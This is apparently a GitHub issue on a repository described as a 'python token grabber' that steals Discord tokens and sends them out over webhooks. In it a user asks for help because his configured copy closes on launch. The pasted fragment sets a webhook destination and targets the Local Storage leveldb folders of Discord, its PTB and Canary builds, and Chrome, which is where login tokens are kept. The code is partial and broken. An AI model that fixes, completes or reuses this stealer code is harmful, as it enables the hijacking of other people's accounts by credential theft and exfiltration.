DeadBread76 / python-token-grabber

Neat little grabber that grabs discord tokens and sends them over webhooks
65 stars 50 forks source link

It instantly closes #7

Open Petar252525 opened 3 years ago

Petar252525 commented 3 years ago

I changed the inside to what it needed to be but when i start it, it instantly closes.

hook = Webhook('gSocYG8uVFC7itiksUhhQCyTBjkLbZ6Bo7S3Q8Amatkj3WmtigE07Ghmvw3ft7XrkW9g') path = os.getenv('APPDATA') localpath = os.getenv('LOCALAPPDATA') user = os.getenv('maicamati') pc_name = os.environ['This Pc'] temp_dir = localpath+"\temp\" tokendir = path+"\Discord\Local Storage\leveldb\" ptbtokendir = path+"\discordptb\Local Storage\leveldb\" canarytokendir = path+"\discordcanary\Local Storage\leveldb\" chromedir = localpath + "\Google\Chrome\User Data\Default\Local Storage\leveldb\"

Please lmk whats wrong